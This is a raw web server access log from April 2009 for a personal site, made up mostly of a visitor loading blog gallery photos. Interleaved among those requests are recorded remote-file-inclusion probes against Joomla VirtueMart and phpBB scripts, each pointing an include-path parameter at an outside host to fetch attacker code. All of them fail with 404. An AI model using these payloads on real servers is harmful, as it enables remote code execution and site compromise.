213.189.27.153 - - [02/Apr/2009:11:09:40 -0700] "GET /logs/access_080621.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:41 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_049.jpg HTTP/1.1" 200 565161 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:41 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:41 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_056.jpg HTTP/1.1" 200 304130 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
213.248.62.104 - - [02/Apr/2009:11:09:42 -0700] "GET /logs/access_080621.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:43 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_058.jpg HTTP/1.1" 200 378922 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:43 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:43 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:43 -0700] "GET /logs/access_080621.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:44 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_059.jpg HTTP/1.1" 200 408055 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
213.248.62.104 - - [02/Apr/2009:11:09:44 -0700] "GET /logs/access_080621.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:44 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_060.jpg HTTP/1.1" 200 403062 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:44 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_013-3.jpg HTTP/1.1" 200 745570 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:45 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_057.jpg HTTP/1.1" 200 242323 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
213.189.27.153 - - [02/Apr/2009:11:09:45 -0700] "GET /logs/access_080621.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:46 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:46 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:46 -0700] "GET /logs/access_080621.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:46 -0700] "GET /logs/access_080530.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:46 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_003-4.jpg HTTP/1.1" 200 604279 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:46 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_004-4.jpg HTTP/1.1" 200 571926 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
213.248.62.104 - - [02/Apr/2009:11:09:47 -0700] "GET /logs/access_080530.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:49 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_006-4.jpg HTTP/1.1" 200 629974 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:49 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_007-4.jpg HTTP/1.1" 200 584515 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
213.248.62.104 - - [02/Apr/2009:11:09:50 -0700] "GET /logs/access_080530.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:51 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_008-3.jpg HTTP/1.1" 200 505583 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:52 -0700] "GET /logs/access_080530.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:52 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_009-3.jpg HTTP/1.1" 200 567132 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
213.248.62.104 - - [02/Apr/2009:11:09:53 -0700] "GET /logs/access_080621.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:54 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_011-3.jpg HTTP/1.1" 200 497440 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:54 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_015-3.jpg HTTP/1.1" 200 766004 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:56 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_016-3.jpg HTTP/1.1" 200 686229 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
81.176.226.164 - - [02/Apr/2009:11:09:57 -0700] "GET /logs/access_080530.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.248.62.104 - - [02/Apr/2009:11:09:58 -0700] "GET /logs/access_080530.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:58 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_017-3.jpg HTTP/1.1" 200 707125 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:09:58 -0700] "GET /blog/wp-content/gallery/worldrider-2008/1008081252.jpg HTTP/1.1" 200 482728 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:00 -0700] "GET /blog/wp-content/gallery/worldrider-2008/1008081327.jpg HTTP/1.1" 200 422678 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:01 -0700] "GET /blog/wp-content/gallery/worldrider-2008/1008081317.jpg HTTP/1.1" 200 411009 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:03 -0700] "GET /blog/wp-content/gallery/2008-26-09-tag/001.jpg HTTP/1.1" 200 574287 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:04 -0700] "GET /blog/wp-content/gallery/2008-26-09-tag/011.jpg HTTP/1.1" 200 498160 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:06 -0700] "GET /blog/wp-content/gallery/2008-26-09-tag/003.jpg HTTP/1.1" 200 468643 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:06 -0700] "GET /blog/wp-content/gallery/2008-26-09-tag/005.jpg HTTP/1.1" 200 431036 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:08 -0700] "GET /blog/wp-content/gallery/2008-26-09-tag/008.jpg HTTP/1.1" 200 375789 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:09 -0700] "GET /blog/wp-content/gallery/2008-26-09-tag/013.jpg HTTP/1.1" 200 480085 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:10 -0700] "GET /blog/wp-content/gallery/2008-26-09-tag/014b.jpg HTTP/1.1" 200 373029 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:11 -0700] "GET /blog/wp-includes/images/smilies/icon_smile.gif HTTP/1.1" 200 174 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:11 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/d68d_2.jpg HTTP/1.1" 200 6928 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:12 -0700] "GET /blog/wp-content/gallery/westoc-2008/westoc2008.jpg HTTP/1.1" 200 232814 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:12 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-002.jpg HTTP/1.1" 200 362636 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:13 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-008.jpg HTTP/1.1" 200 371220 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:13 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-004.jpg HTTP/1.1" 200 471778 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:14 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-023.jpg HTTP/1.1" 200 426657 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:14 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-034.jpg HTTP/1.1" 200 333874 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:17 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-036.jpg HTTP/1.1" 200 398131 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:17 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-041.jpg HTTP/1.1" 200 539643 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:18 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-048.jpg HTTP/1.1" 200 554270 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
83.222.130.20 - - [02/Apr/2009:11:10:20 -0700] "GET /logs/access_080621.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-050.jpg HTTP/1.1" 200 554749 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-006_0.jpg HTTP/1.1" 200 415659 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-013_0.jpg HTTP/1.1" 200 310891 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
83.138.168.158 - - [02/Apr/2009:11:10:22 -0700] "GET /logs/access_080616.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:22 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-018_0.jpg HTTP/1.1" 200 198343 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:24 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-020_0.jpg HTTP/1.1" 200 331360 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-046_0.jpg HTTP/1.1" 200 506535 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-031_0.jpg HTTP/1.1" 200 395541 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
83.222.130.20 - - [02/Apr/2009:11:10:26 -0700] "GET /logs/access_080621.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-032_0.jpg HTTP/1.1" 200 354402 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:27 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-033_0.jpg HTTP/1.1" 200 419870 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:27 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-034_0.jpg HTTP/1.1" 200 228191 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:28 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-036_0.jpg HTTP/1.1" 200 433253 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:28 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-037_0.jpg HTTP/1.1" 200 187217 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
85.237.201.58 - - [02/Apr/2009:11:10:29 -0700] "GET /logs/access_080930.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://lanaalaadi.com/lana/data/tmp/cache/db.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:30 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-038_0.jpg HTTP/1.1" 200 247996 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:30 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-039.jpg HTTP/1.1" 200 290116 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
85.237.201.58 - - [02/Apr/2009:11:10:30 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://lanaalaadi.com/lana/data/tmp/cache/db.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:31 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-044_0.jpg HTTP/1.1" 200 329985 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:32 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-057.jpg HTTP/1.1" 200 296483 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
